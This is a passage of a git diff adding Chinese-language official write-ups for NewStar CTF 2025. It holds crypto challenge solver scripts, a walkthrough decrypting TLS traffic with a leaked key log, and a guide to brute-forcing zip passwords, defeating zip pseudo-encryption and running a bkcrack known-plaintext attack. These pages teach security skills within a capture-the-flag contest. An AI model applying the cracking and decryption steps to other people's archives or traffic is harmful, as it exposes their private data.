a_j == 0: + b_k = F(0) + else: + b_k = a_j**64 + g_coeffs.append(b_k) + g_poly = R(g_coeffs) + return g_poly + +cc=b'MfYGCnO`w%\x07zSzejG#kkb\x01\x01%eS?]GO`?]\x03m?`ab`kbnsS]``][?S`C\x1dB?{m' +cc=[a**i for i in cc] +f =R(cc) + +g = find_sqrt_in_quotient_ring(f) +mv = [c.log(a) for c in g.coefficients(sparse=False)] +mm="".join(chr(mv[i]) for i in range(len(mv))) +print(mm.encode()) +``` diff --git a/docs/wp/2025/extras/crypto/luck-vs-skill.md b/docs/wp/2025/extras/crypto/luck-vs-skill.md new file mode 100644 index 0000000..3d2797d --- /dev/null +++ b/docs/wp/2025/extras/crypto/luck-vs-skill.md @@ -0,0 +1,5 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + +# 运气与实力 diff --git a/docs/wp/2025/extras/crypto/perm-dlp.md b/docs/wp/2025/extras/crypto/perm-dlp.md new file mode 100644 index 0000000..523468d --- /dev/null +++ b/docs/wp/2025/extras/crypto/perm-dlp.md @@ -0,0 +1,87 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + +# 置换 DLP + +出题人测试的时候找规律做的。你也快来试试吧! + +> [!NOTE] 找规律 +> 我们举个简单的例子 : $(12345)$, 我们观察它的幂都是什么样子: +> $(13524)$ >$(14253)$ >$(15432)$ >$\mathrm{id}$ +> 另外一个例子:$(1234)$: +> $(13)(24)$ >$(1432)$ >$\mathrm{id}$ +> 你可以猜一下$S_6$的元素会是什么情况。 + +题目脚本: + +```python +import random, math, sys +from secret import FLAG + +def lcm(a,b): return a* b // math.gcd(a,b) +def compose(a,b): return [a[i-1] for i in b] +def perm_pow(g,e): + r=list(range(1,len(g)+1)); + while e: + if e&1: r=compose(g,r) + g=compose(g,g); e//=2 + return r +def cycles(p): + seen=[0]*(len(p)+1); out=[] + for i in range(1,len(p)+1): + if not seen[i]: + c=[]; j=i + while not seen[j]: seen[j]=1; c.append(j); j=p[j-1] + if len(c)>1: out.append("("+ " ".join(map(str,c)) +")") + return " ".join(out) or "()" +def order(p): + seen=[0]*(len(p)+1); res=1 + for i in range(1,len(p)+1): + if not seen[i]: + c=0; j=i + while not seen[j]: seen[j]=1; j=p[j-1]; c+=1 + res=lcm(res,c) + return res + +def make_instance(force_unsolvable=False): + n=random.randint(4,12) + g=list(range(1,n+1)) + while g==list(range(1,n+1)) or order(g)<3: random.shuffle(g) + ordg=order(g) + if force_unsolvable: + # pick random h not in + while True: + h=list(range(1,n+1)); random.shuffle(h) + if all(perm_pow(g,e)!=h for e in range(ordg)): break + else: + h=perm_pow(g,random.randrange(2,ordg)) + return n,g,h + +def main(): + print("=== Permutation Discrete Log Challenge ===") + print("Find x such that g^x = h (0 <= x < ord(g)), or print 'no' if no solution.") + print("5 rounds total. One round has no solution.\n") + unsolvable_round=random.randint(0,4) + for r in range(5): + n,g,h=make_instance(r==unsolvable_round) + print(f"Round {r+1}/5\nS_{n}") + print(cycles(g)," ",cycles(h)) + ans=input("Your answer: ").strip() + ordg=order(g) + has_sol=any(perm_pow(g,e)==h for e in range(ordg)) + if ans.lower()=="no": + if has_sol: print("Wrong. Solution exists."); return + else: + try: x=int(ans) + except: print("Invalid input."); return + if not has_sol or perm_pow(g,x%ordg)!=h: + print("Wrong answer."); return + print("Correct!\n") + print("Congratulations! Your FLAG:",FLAG) + +if __name__=="__main__": + try: main() + except (EOFError,KeyboardInterrupt): sys.exit(0) + +``` diff --git a/docs/wp/2025/extras/crypto/random-1.3.md b/docs/wp/2025/extras/crypto/random-1.3.md new file mode 100644 index 0000000..a66cec9 --- /dev/null +++ b/docs/wp/2025/extras/crypto/random-1.3.md @@ -0,0 +1,40 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + +# 随机数之旅 1.3 + +```python +import uuid +from Crypto.Util.number import * +import random + +FLAG="FLAG{"+str(uuid.uuid4())+"}" +m=bytes_to_long(FLAG.encode()) + +p=getPrime(m.bit_length()+3) +a=getPrime(p.bit_length()) + +print("p=",p) + +hint=[random.randint(1,p-1),] +for i in range(10): + hint.append((a*hint[-1]+m)%p) + +print(hint) +``` + +类似随机数之旅1,但这里只给了$p$,需要我们自己求$a,m$ +思路见随机数之旅1(w1),GCL(w3) + +```python +from Crypto.Util.number import * + +p= +h= + +a=(h[4]-h[3])*inverse(h[3]-h[2],p) % p +b=(h[3]-a*h[2])%p + +print(long_to_bytes(b)) +``` diff --git a/docs/wp/2025/extras/crypto/random-1.9.md b/docs/wp/2025/extras/crypto/random-1.9.md new file mode 100644 index 0000000..43b388c --- /dev/null +++ b/docs/wp/2025/extras/crypto/random-1.9.md @@ -0,0 +1,10 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + +# 随机数之旅 1.9 + +上题的进阶,但是 $p$ 也不给了。 +思路见 GCL(w3) + +脚本略。(这题有点老了其实,网上能搜到一大堆脚本。) diff --git a/docs/wp/2025/extras/crypto/random-2.md b/docs/wp/2025/extras/crypto/random-2.md new file mode 100644 index 0000000..629efd4 --- /dev/null +++ b/docs/wp/2025/extras/crypto/random-2.md @@ -0,0 +1,94 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + +# 随机数之旅 2 + +魔改 mt19937,但 temper 段简化了: + +```python + def extract_number(self): + if self.mti == 0: + self.twist() + y = self.mt[self.mti] + y = y ^ y >> 11 # temper 段 + y = y ^ y << 7 & 0x0d000721 # temper 段 + self.mti = (self.mti + 1) % 114 + return _int32(y) + + def twist(self): + for i in range(0, 114): + y = _int32((self.mt[i] & 0x90000000) + (self.mt[(i + 1) % 114] & 0x8fffffff)) + self.mt[i] = (y >> 1) ^ self.mt[(i + 66) % 114] + if y % 2 != 0: + self.mt[i] = self.mt[i] ^ 0x0d000721 +``` + +只需要逆向 temper 段,即可恢复完整的 `self.mt`,随后再输出 11 个随机数即可解密。 + +下面给出用于逆向 temper 段并恢复密钥的脚本: + +```python +h= +c= + +# ---- 工具函数 +def xor(a,b): + assert len(a)==len(b) + return "".join(str((int(a[i])+int(b[i]))%2) for i in range(len(a))) + +def both(a,b): + assert len(a)==len(b) + return "".join(str(int(a[i])*int(b[i])) for i in range(len(a))) + +def _int32(x): + return int(0xFFFFFFFF & x) + +# 逆 temper 段第一行 +def re1(y): + y=bin(y)[2:].zfill(32) + A = y[:11] + B = xor(y[11:22],A) + C = xor(y[-10:],B[:10]) + return int(A+B+C,2) + +# 逆 temper 段第二行 +def re2(y): + t=bin(0x0d000721)[2:] + y=bin(y)[2:].zfill(32) + A = xor(y[-7:],both(t[-7:],"0"*7)) + B = xor(y[18:25],both(t[-14:-7],A)) + C = xor(y[11:18],both(t[-21:-14],B)) + D = xor(y[4:11],both(t[:7],C)) + E = y[:4] + return int(E+D+C+B+A,2) + +class MT19_937: +# 略 + +mt_rec=[re1(re2(_int32(h[i]))) for i in range(114)] + +aa=MT19_937(0) +aa.mt=mt_rec +key=[aa.extract_number() for _ in range(11)] + +x=1 +for i in key: + x*=i + +from Crypto.Util.number import * +print(long_to_bytes(c^x)) +``` + +补充说明:为什么恢复 `self.mt` 后可以直接输出 11 个随机数解密,而不需要先跳过 114 个数? + +原因如下: + +```python + def extract_number(self): + if self.mti == 0: + self.twist() + #...... +``` + +`self.mti` 默认是0,当我们导入 `self.mt`(`aa.mt=mt_rec`)时,就已经帮我们过掉了。 diff --git a/docs/wp/2025/extras/crypto/random-3.6.md b/docs/wp/2025/extras/crypto/random-3.6.md new file mode 100644 index 0000000..cbf6ce8 --- /dev/null +++ b/docs/wp/2025/extras/crypto/random-3.6.md @@ -0,0 +1,81 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + +# 随机数之旅 3.6 + +```python +# Sage 9.3 +import random +import uuid + +FLAG="FLAG{"+str(uuid.uuid4())+"}" +n=len(FLAG) +m=n-6 +p=random_prime(2**64) + +A=[random.randint(p//2,p-1) for _ in range(m*n)] +A=matrix(Zmod(p),m,n,A) +x=[ord(i) for i in FLAG] +x=vector(x) +b=A*x + +with open("output.txt","w") as f: + f.write(str(p)+"\n") + f.write(str(list(A))+"\n") + f.write(str(list(b))) +``` + +这是「随机数之旅 3」的进阶版本。这里 $m=n-6$,方程数量不足,但 FLAG 的六个已知字符 `f,l,a,g,{,}` 可以用于补充约束并求解。 + +```python +# Sage +with open("output.txt","r") as f: + p=eval(f.readline()) + A=eval(f.readline()) + b=eval(f.readline()) + +A=matrix(Zmod(p),A) +b=vector(b) + +x0=A.solve_right(b) # 特解 + +ArK=A.right_kernel().basis() #右核的基 +c=[ArK[i] for i in range(6)] + +known = {0:ord('f'),1:ord('l'),2:ord('a'),3:ord('g'),4:ord('{'),-1:ord('}')} +rows = [] +rhs = [] +for idx, val in known.items(): + row = [c_i[idx] for c_i in ArK] # 取 6 个基向量在该坐标的分量 + rows.append(row) + rhs.append(val - x0[idx]) +C = Matrix(Zmod(p), rows) +Y = vector(Zmod(p), rhs) +T = C.solve_right(Y) #计算系数 + +mes=x0+sum(T[i]*c[i] for i in range(6)) +print(mes) +mes=list(mes) +f="".join(chr(int(mes[i])) for i in range(len(mes))) +print(f) +``` + +预期外解法:格规约。 + +```python +n=42 +k=16 #取 16 条方程就足够计算了。 +Ge=matrix(ZZ,n+2*k,n+2*k) +for i in range(n): + Ge[i,i]=1#+1 + #Ge[n,i]=-1 + for j in range(k): + Ge[n+j,n+j]=1 + Ge[i,n+k+j]=A[j][i] + Ge[n+j,n+k+j]=-p + Ge[n+k+j,n+k+j]=b[j] + +Ge=Ge.LLL() +print(Ge) +``` diff --git a/docs/wp/2025/extras/crypto/random-3.9.md b/docs/wp/2025/extras/crypto/random-3.9.md new file mode 100644 index 0000000..b67491e --- /dev/null +++ b/docs/wp/2025/extras/crypto/random-3.9.md @@ -0,0 +1,66 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + +# 随机数之旅 3.9 + +$A_{500\times 30}\pmb x_{30\times 1}+\pmb e_{500\times 1}=\pmb b_{500\times 1}$ +已知 $A,\pmb b$,且 $\pmb e$ 的分量只有两种取值,要求恢复 $\pmb x$。 + +```python +n=30 +m=500 +p=random_prime(2**64) + +ec=[random.randint(1,p-1) for _ in range(2)] +e=[random.choice(ec) for _ in range(m)] +e=vector(e) + +A=[random.randint(1,p-1) for _ in range(m*n)] +A=matrix(Zmod(p),m,n,A) +x=vector([random.randint(1,2**32) for _ in range(n)]) + +b=A*x+e +``` + +显然有 +$$\sum_{j}^{30}a_{ij}x_j +e_i=b_i$$ +于是 +$$(\sum_{j}^{30}a_{ij}x_j +ec[0]-b_i)(\sum_{j}^{30}a_{ij}x_j +ec[1]-b_i)=0$$ +这样的二次方程共有 500 个,而未知项数量为 $30\times 31/2+30=495$,因此可以求解。 +将 $x_0x_0,x_0x_1,\cdots,x_ix_j,\cdots,x_{29}x_{29},x_0,\cdots,x_{29}$ 视为独立未知量后,该问题可转化为线性方程组。 + +```python +n=30 +m=500 +t=30*31/2+30 + +C=matrix(Zmod(p),m,t) +Y=[0 for _ in range(m)] +for i in range(m): + for j in range(n): + C[i,j]=A[i][j]*(ec[0]+ec[1])-2*A[i][j]*b[i] + +for k in range(m): + for i in range(n): + for j in range(i+1): + C[k,n+i*(i+1)//2+j]=A[k][i]*A[k][j] + +for i in range(m): + Y[i]=-1*(ec[0]-b[i])*(ec[1]-b[i]) + +Y=vector(Y) +print(C.rank())#495 +xx=C.solve_right(Y) +print(xx[:n]) + +key=prod(xx[:n]) +``` + +也可以考虑使用 NumPy 优化矩阵运算,但当前规模下直接求解已经足够。 + +意料之中的非预期: +使用线性映射 $ec[i]\rightarrow a\cdot ec[i]+b=ec^{\prime}[i]$,让 $ec^{\prime}[i]$ 足够小,然后用格方法求解。 + +意料之外的非预期: +中间相遇攻击 diff --git a/docs/wp/2025/extras/crypto/simple-not-simple.md b/docs/wp/2025/extras/crypto/simple-not-simple.md new file mode 100644 index 0000000..5a1056b --- /dev/null +++ b/docs/wp/2025/extras/crypto/simple-not-simple.md @@ -0,0 +1,58 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + +# 简约但不简单 + +```python +import uuid +from random import getrandbits as grb + +FLAG="FLAG{"+str(uuid.uuid4())+"}" +a,b=[grb(32) for _ in range(2)] +pd={} + +def f(s,j): + n=len(s) + return sum(ord(s[i])*j**(n-1-i) for i in range(n)) + +for _ in range(3): + x=grb(32) + pd[x]=a*f(FLAG,x)+b + +print("pd=",pd) +``` + +EXP: + +```python +pd={} +t=list(pd.keys()) +ft=[pd[i] for i in t] + +Ge=matrix(ZZ,44,42+n) +for i in range(42): + Ge[i,i]=1 + for j in range(n): + Ge[i,42+j]=t[j]**(41-i) + Ge[-2,42+j]=-1 + Ge[-1,42+j]=-ft[j] +Ge[42,42]=1 +Ge=Ge.LLL() +#print(Ge) +#print(Ge[0]) +#print(Ge[1]) +#print(Ge[2]) +print(Ge[3]) + +x=list(Ge[3]) +assert x[0]!=0 +from math import gcd +aa=gcd(x[0],x[1],x[2]) +print(aa) +x=[x[i]//aa for i in range(42)] +print(x) +print("".join(chr(int(x[i])) for i in range(0,41))) +``` + +要点:题目给出的是 `a*f(flag,x)+b`,本质上与给出 `f(flag,x)` 没有区别。常数项会与 $b$ 共同作用,而 $a$ 可以通过 GCD 消去。 diff --git a/docs/wp/2025/extras/crypto/weil-noise-order.md b/docs/wp/2025/extras/crypto/weil-noise-order.md new file mode 100644 index 0000000..729be38 --- /dev/null +++ b/docs/wp/2025/extras/crypto/weil-noise-order.md @@ -0,0 +1,5 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + +# Weil 的噪声与秩序 diff --git a/docs/wp/2025/extras/index.md b/docs/wp/2025/extras/index.md new file mode 100644 index 0000000..bfd5f55 --- /dev/null +++ b/docs/wp/2025/extras/index.md @@ -0,0 +1,9 @@ +--- +title: WriteUp +titleTemplate: ":title - NewStar CTF 2025" +comments: false +--- + +# WriteUp - NewStar CTF 2025 + +这里是 NewStar CTF 2025 挑战题 的官方 WriteUp 页面。 diff --git a/docs/wp/2025/extras/misc/not-all-milk.md b/docs/wp/2025/extras/misc/not-all-milk.md new file mode 100644 index 0000000..82b5701 --- /dev/null +++ b/docs/wp/2025/extras/misc/not-all-milk.md @@ -0,0 +1,100 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + +# 不是所有牛奶都叫\_\_\_ + +> 什么牛奶?MN?YGNC?YL?特 @$&!$&\*!@$^&-------------------. +> (FLAG 提交时去掉&符号) + +这道题的核心知识点是 TLS 流量解密。 + +先从题目和题目描述入手。 + +题目描述引用的是较常见的广告语,横线处可联想到对应关键词。 + +根据题目描述,将一些常见品牌名缩写为大写首字母后,可以猜到空白处应为: + +TLS + +随后对流量进行分析。即使没有理解题目暗示,也可以从流量本身继续推进。 + +打开流量就能看到我们常见到的 TCP 协议流量,当然还看到一种平时可能不会看到的协议 + +TLSv1.3,老样子我们先搜索一下,就能够了解到一些信息 + +![TLS 关键词搜索结果](/assets/images/wp/2025/extras/not-all-milk_1.png) + +除自动摘要外,搜索结果中已经能看到与流量加解密相关的信息。 + +TLS 全称为 Transport Layer Security,前身为 SSL,能够对传输信息进行加密保护。如果需要解密这些信息,除了通信双方使用约定密钥外,也可以借助 SSL key log 进行解密。 + +因此本题的首要目标是找到 SSL key log。 + +我们先继续审计一下,发现后半段开始出现了 http 协议的流量,我们把他们过滤一下 + +![过滤 HTTP 流量](/assets/images/wp/2025/extras/not-all-milk_2.png) + +在过滤器输入 http,我们单独过滤 http 流量,就会发现这似乎是在对某个服务器在进行浏览和文件的下载? + +其中还不乏大量我们喜闻乐见的 FLAG 的变式,但是大部分都是些垃圾信息 + +![干扰 FLAG 内容](/assets/images/wp/2025/extras/not-all-milk_3.png) + +这些内容主要用于混淆视听。 + +我们慢慢查看,或许 sslkey 就隐藏在这些下载的文件当中。 + +虽然题目没有留下非常明确的定位提示,但该文件名明显区别于其他噪声文件,逐步筛查即可找到。 + +![发现 SSL key log 文件](/assets/images/wp/2025/extras/not-all-milk_4.png) + +初现端倪,我们看看哪里下载了他 + +原来就在下面两行 + +![定位下载请求](/assets/images/wp/2025/extras/not-all-milk_5.png) + +追踪流看内容 + +![追踪流查看 key log](/assets/images/wp/2025/extras/not-all-milk_6.png) + +这就是所需的 SSL key log。 + +即使没有理解题目暗示,在流量审计过程中也会注意到这一长串内容。搜索其格式后,也可以判断它是 TLS secrets log file。 + +其中「TLS secrets log file」本身也是明显提示。 + +接下来将引号内的内容全部取出并处理,例如将 `\n` 转为真实换行,去掉末尾多余的 `\n`,最后保存为 `.log` 文件即可。 + +然后我们点击左上角的编辑,打开首选项 + +![Wireshark TLS 协议配置](/assets/images/wp/2025/extras/not-all-milk_7.png) + +然后在左侧选择 protocols(协议) + +![配置 key log 文件](/assets/images/wp/2025/extras/not-all-milk_8.png) + +然后找到 TLS + +![解密后的 HTTP 流量](/assets/images/wp/2025/extras/not-all-milk_9.png) + +把我们处理后的 log 文件选入(Pre)-Master-Secret log filename 中 + +点击确认,然后我们就会发现,原先大量只有 tlsv1.3 协议的部分就解密出了许多新的 http 协议流量,让我们重新过滤一次 http + +请求方式大量都是 POST,少量 GET 的请求看到回复都是 file server ready,大概只是一些确认连接的无用信息,所以我们的中心转向查看 post 的内容都有什么 + +可以看到 post 的内容又是一大堆没有用的垃圾信息,既然我们已经经过了一轮这样的筛选信息,不难想到我们又要从中找到需要的内容 + +![提取二维码内容](/assets/images/wp/2025/extras/not-all-milk_10.png) + +终于在第 50 个流我们找到了不一样的内容,这个就是一个图片的 base64 编码形式,我们拿去 cyberchef 下载文件 + +![扫描二维码获得 FLAG](/assets/images/wp/2025/extras/not-all-milk_11.png) + +就得到了二维码,扫描之后就是 FLAG 了 + +总结: + +本题核心考点是 TLS 流量解密,主要难点在于从较多噪声流量中定位 SSL key log。完成题目后,可以重点复盘 Wireshark 中 TLS 解密配置、HTTP 流量筛选以及可疑文件定位流程。 diff --git a/docs/wp/2025/extras/pwn/llama-pwn.md b/docs/wp/2025/extras/pwn/llama-pwn.md new file mode 100644 index 0000000..3fbd474 --- /dev/null +++ b/docs/wp/2025/extras/pwn/llama-pwn.md @@ -0,0 +1,5 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + +# llama-pwn diff --git a/docs/wp/2025/extras/reverse/not-symmetric.md b/docs/wp/2025/extras/reverse/not-symmetric.md new file mode 100644 index 0000000..23fddb1 --- /dev/null +++ b/docs/wp/2025/extras/reverse/not-symmetric.md @@ -0,0 +1,5 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + +# Not Symmetric diff --git a/docs/wp/2025/extras/web/whossti-revenge.md b/docs/wp/2025/extras/web/whossti-revenge.md new file mode 100644 index 0000000..56d9add --- /dev/null +++ b/docs/wp/2025/extras/web/whossti-revenge.md @@ -0,0 +1,5 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + +# who'ssti revegne diff --git a/docs/wp/2025/index.md b/docs/wp/2025/index.md new file mode 100644 index 0000000..5a81b0c --- /dev/null +++ b/docs/wp/2025/index.md @@ -0,0 +1,33 @@ +--- +title: WriteUp +titleTemplate: ":title - NewStar CTF 2025" +comments: false +aside: false +--- + + + +# WriteUp - NewStar CTF 2025 + +这里是 NewStar CTF 2025 的官方 WriteUp 页面。 + +--- + + + +若无特别说明,WriteUp 中的所有文字内容均遵循 CC-BY-SA 4.0 协议进行分发,代码部分遵循 MIT 协议进行分发。 + + +出题人、验题人名单: + + + +贡献度名单 + + diff --git a/docs/wp/2025/week1/crypto/little-frog.md b/docs/wp/2025/week1/crypto/little-frog.md new file mode 100644 index 0000000..c14b2ca --- /dev/null +++ b/docs/wp/2025/week1/crypto/little-frog.md @@ -0,0 +1,19 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + + + +# 小跳蛙 + + + +本题考查 GCD 及简单的数论知识。 + + +题目脚本已经告诉我们了,每次给出一个坐标 `(x,y)`,我们需要返回最后小青蛙会停留的坐标。 + +1. 你可以**直接复用题目脚本的验证部分**,即 `while a!=b:` 那一块。 +2. 感觉直接复用太 low 了?没事你还可以学习发现:小跳蛙跳跃的过程就是在模拟辗转相除法(欧几里得算法)求两个数的最大公约数!这样就好办了,我们**找一个库去使用 `gcd()` 函数**就行了。 diff --git a/docs/wp/2025/week1/crypto/random-1.md b/docs/wp/2025/week1/crypto/random-1.md new file mode 100644 index 0000000..c68ebf8 --- /dev/null +++ b/docs/wp/2025/week1/crypto/random-1.md @@ -0,0 +1,28 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + + + +# 随机数之旅 1 + + + +题考查 LCG 流密码。 + + +`flag` 转为整数 `b`,容易知道题目给出了关系式: + +$$X_{i+1}=aX_i+b\;\;\pmod{p}$$ + +$a,p$ 已知,同时给了连续 $5$ 个 $X_i$ ,很容易计算出以下结果。 + +$$b=X_{i+1}-aX_{i}\;\;\pmod{p}$$ + + + +题目文件的名字是 `random_jerni1`,其中 `jerni` 是 journey 的谐音。 + + diff --git a/docs/wp/2025/week1/crypto/rsa-intro.md b/docs/wp/2025/week1/crypto/rsa-intro.md new file mode 100644 index 0000000..a8fc406 --- /dev/null +++ b/docs/wp/2025/week1/crypto/rsa-intro.md @@ -0,0 +1,14 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + + + +# 初识 RSA + + + +本题考查对 RSA 的简单理解。 + diff --git a/docs/wp/2025/week1/crypto/sagemath-guide.md b/docs/wp/2025/week1/crypto/sagemath-guide.md new file mode 100644 index 0000000..56a45b9 --- /dev/null +++ b/docs/wp/2025/week1/crypto/sagemath-guide.md @@ -0,0 +1,17 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + + + +# SageMath 使用指南 + +安装 [sagemath](https://www.sagemath.org/),运行程序即可。 + + + +题目文件引用了许多群,并计算它们的阶,然后相乘得到一个大数作为 `key`。 + + diff --git a/docs/wp/2025/week1/crypto/unique-repr.md b/docs/wp/2025/week1/crypto/unique-repr.md new file mode 100644 index 0000000..ead5118 --- /dev/null +++ b/docs/wp/2025/week1/crypto/unique-repr.md @@ -0,0 +1,34 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + + + +# 唯一表示 + + + +本题考查 CRT. + + +这里简单介绍一个函数: + +`n, k = crt(primes, remainders)` 这是 [sympy 库](https://docs.sympy.org/latest/index.html)的一个用于求解线性同余方程组的函数。 + +> [!TIP] (一元)线性同余方程组 +> (其中 $n_1,\cdots,n_k$ 两两互质) +> $$\begin{cases}x&\equiv a_1({\mathrm{mod}}\;n_1)\\x&\equiv a_2({\mathrm{mod}}\;n_2)\\&\vdots\\x&\equiv a_k({\mathrm{mod}}\;n_k)&\end{cases}$$ + +`primes` 就是要输入数组 `[n_1,...,n_k]` ,`remainders` 就是要输入数组 `[a_1,...,a_k]`。 + +`n` 是该函数返回的最小的 `x`(显然方程组有一组解,这些解在模的意义下等同),`k` 就是模。 + +题目要求的 `flag` 转换成了整数,然后使用了 `fun()` 函数处理,得到了一个数组。容易知道该数组就是上面讲的 `remainders`,而 `primes` 已经告诉了怎么生成的。**直接复用 `crt()` 就可以求解**,再把数字转换为字节即可。 + + + +题目文件的名字是 `unik_repri`,其中 `unik` 是 unique 的谐音,`repri` 取自 representation 的开头几个音节。 + + diff --git a/docs/wp/2025/week1/index.md b/docs/wp/2025/week1/index.md new file mode 100644 index 0000000..80310d6 --- /dev/null +++ b/docs/wp/2025/week1/index.md @@ -0,0 +1,9 @@ +--- +title: WriteUp +titleTemplate: ":title - NewStar CTF 2025" +comments: false +--- + +# WriteUp - NewStar CTF 2025 + +这里是 NewStar CTF 2025 Week 1 的官方 WriteUp 页面。 diff --git a/docs/wp/2025/week1/misc/compression-magic.md b/docs/wp/2025/week1/misc/compression-magic.md new file mode 100644 index 0000000..00c5f98 --- /dev/null +++ b/docs/wp/2025/week1/misc/compression-magic.md @@ -0,0 +1,111 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + + + +# Misc 城邦:压缩术 + + + +题考查压缩包暴力破解、伪加密、明文攻击等压缩包相关知识点。 + + +本题为压缩包隐写常见考点,在写这题之前,可以查阅关于压缩包与隐写的相关知识点。 + +我们先读题目描述,题目描述中说 `请挑战者们通过6位密码门开始挑战吧!(要想使用压缩术,请先念咒语"abcd...xyz0123...789")`,可以得知第一关是密码暴力破解,且是只由数字和小写字母组成的 6 位密码。 + +我们可以使用相关工具,如 `ARCHPR`、`Passware kit` 等,也可以自己写脚本。 + +这里我使用的是 `ARCHPR`,选择密码暴力范围。 + +![压缩包文件结构](/assets/images/wp/2025/week1/compression-magic_1.png) + +点击开始,我们就得到了第一关压缩包加密的密码:`ns2025`。 + +![压缩包加密标志位](/assets/images/wp/2025/week1/compression-magic_2.png) + +解压后得到 `tips.txt` 和 `bkcrack.zip` (这里框住,后面要考)。 + +在 `tips.txt` 中提到`(下一扇门明明没有密码,为什么还是要输入密码呢?)`我们可以得知第二关为伪加密。 + +在此之前,我们可以了解一下 zip 文件的文件结构。 + +**ZIP 文件头 (Local file header)** + +| 字段名称 | 长度(byte) | 说明 | +| --------------------------- | ------------ | ---------------------------------------------------------- | +| Local file header signature | 4 | 文件头标识,固定值 `50 4B 03 04` | +| Version needed to extract | 2 | 解压文件所需的 ZIP 最低版本 | +| General purpose bit flag | 2 | 通用位标志,通常只需要考虑当 `bit 0` 为 1 时表示文件被加密 | +| Compression method | 2 | 压缩方式,当值为 0x0000 时表示无压缩 | +| Last mod file time | 2 | 文件最后修改时间,以 standard MS-DOS 格式编码 | +| Last mod file date | 2 | 文件最后修改日期 | +| CRC-32 | 4 | 未压缩数据的 CRC32 | +| Compressed size | 4 | 压缩后的大小,单位为 byte | +| Uncompressed size | 4 | 未压缩的大小 | +| File name length | 2 | 文件名长度 | +| Extra field length | 2 | 扩展区域长度 | +| File name | N | 文件名 | +| Extra field | N | 扩展区域 | + +**核心目录 (Central directory)** + +| 字段名称 | 长度(byte) | 说明 | +| --------------------------------------- | ------------ | ---------------------------------------------------------- | +| Central directory file header signature | 4 | 中心目录文件头标识,固定值 `50 4B 01 02` | +| Version made by | 2 | 压缩所用的 ZIP 版本 | +| Version needed to extract | 2 | 解压文件所需的 ZIP 最低版本 | +| General purpose bit flag | 2 | 通用位标志,通常只需要考虑当 `bit 0` 为 1 时表示文件被加密 | +| Compression method | 2 | 压缩方式,当值为 0x0000 时表示无压缩 | +| Last mod file time | 2 | 文件最后修改时间 | +| Last mod file date | 2 | 文件最后修改日期 | +| CRC-32 | 4 | 未压缩数据的 CRC32 | +| Compressed size | 4 | 压缩后的大小 | +| Uncompressed size | 4 | 未压缩的大小 | +| File name length | 2 | 文件名长度 | +| Extra field length | 2 | 扩展区域长度 | +| File comment length | 2 | 文件注释长度 | +| Disk number start | 2 | 文件开始位置所在的磁盘编号 | +| Internal file attributes | 2 | 内部文件属性 | +| External file attributes | 4 | 外部文件属性 | +| Relative offset of local header | 4 | 本地文件头的相对偏移 | +| File name | N | 文件名 | +| Extra field | N | 扩展区域 | +| File comment | N | 文件注释 | + +按照上述的文件结构,我们可以得知在`General purpose bit flag`其二进制的最低位为 1,表示文件被标记为加密, 要解决伪加密问题,只需将该标志位修改为 `00 00`,即关闭加密标志。 + +![修改加密标志位](/assets/images/wp/2025/week1/compression-magic_3.png) + +将 `09 00` 改为 `00 00`。 + +![解压得到 key 和 flag.zip](/assets/images/wp/2025/week1/compression-magic_4.png) + +改完后保存,这事我们就可以发现压缩包就没有显示加密了,我们继续解压缩,得到了 `key.txt` 和 `flag.zip`。 + +在 `flag.zip` 里面同样有 `key.txt`,结合之前的 bkcrack 的名字,我们不难猜出第三关是压缩包明文攻击。 + +为了验证是否可以进行明文攻击,我们将 `key.txt` 进行与 `flag.zip` 相同方式的压缩,可以发现他们的 CRC32 校验值一样,则可以进行明文攻击。 + +![CRC32 校验一致](/assets/images/wp/2025/week1/compression-magic_5.png) + +接下来我们使用 bkcrack 对 `flag.zip` 进行明文攻击,在此之前我们先了解一下相关参数。 + +参数解释: + +```plaintext +-C 加密压缩包 +-c 提取的密文部分 +-p 提取的明文部分 +``` + +![bkcrack 明文攻击](/assets/images/wp/2025/week1/compression-magic_6.png) + +然后我们可以用 key 删除密码,在同一目录下生成一个具有相同内容但不加密的 `flag2.zip` + +![打开 flag2.zip](/assets/images/wp/2025/week1/compression-magic_7.png) + +打开 `flag2.zip` 即可得到 FLAG。 diff --git a/docs/wp/2025/week1/misc/ez-fence.md b/docs/wp/2025/week1/misc/ez-fence.md new file mode 100644 index 0000000..d4ace60 --- /dev/null +++ b/docs/wp/2025/week1/misc/ez-fence.md @@ -0,0 +1,163 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + + + +# EZ_fence + + + +题考查 Base64 编码、栅栏加密。 + + +下载好附件可以看到一张图片,并且题干上提示了 rar,可以知道图片内藏了一个压缩包,用 winhex 打开图片,搜索 rar 文件头 `52 61 72 21 1A 07 01`(从文件头可以看出这是一个加密后的压缩包),可以看到 + +![压缩包](/assets/images/wp/2025/week1/ez-fence_1.png) + +将文件头后剩余部分复制另存可以得到压缩包。 + +::: tip +这里还有一个偷懒的方法,直接改变图片的后缀也可以得到压缩包。 +::: + +再看图片内容是一串字符串,题目给了提示 fence 和数字 4,肯定使用了栏数为 4 的栅栏加密 + +```python +def rail_fence_encrypt(plaintext, rails=4): + """栅栏加密算法,将明文加密为栅栏密码""" + if rails == 1: + return plaintext + + # 创建rails个字符串列表 